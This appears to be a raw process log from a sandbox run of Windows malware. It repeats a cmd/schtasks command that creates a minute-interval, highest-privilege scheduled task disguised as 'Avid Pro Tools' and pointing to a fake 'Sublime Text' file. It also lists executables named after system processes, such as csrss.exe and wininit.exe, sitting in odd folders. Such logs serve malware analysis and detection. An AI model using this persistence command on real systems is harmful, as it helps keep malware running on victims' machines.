"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\eHome\wininit.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\Bloxstrap.exe
C:\winNet\Bloxstrap.exe
C:\Windows\Offline Web Pages\Refcrt.exe
"C:\Windows\Offline Web Pages\Refcrt.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Windows\Offline Web Pages\Refcrt.exe.exe
"C:\Windows\Offline Web Pages\Refcrt.exe.exe"
C:\Users\All Users\Microsoft\eHome\wininit.exe.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\Bloxstrap.exe.exe
"C:\winNet\Bloxstrap.exe.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\Idle.exe
C:\winNet\Idle.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
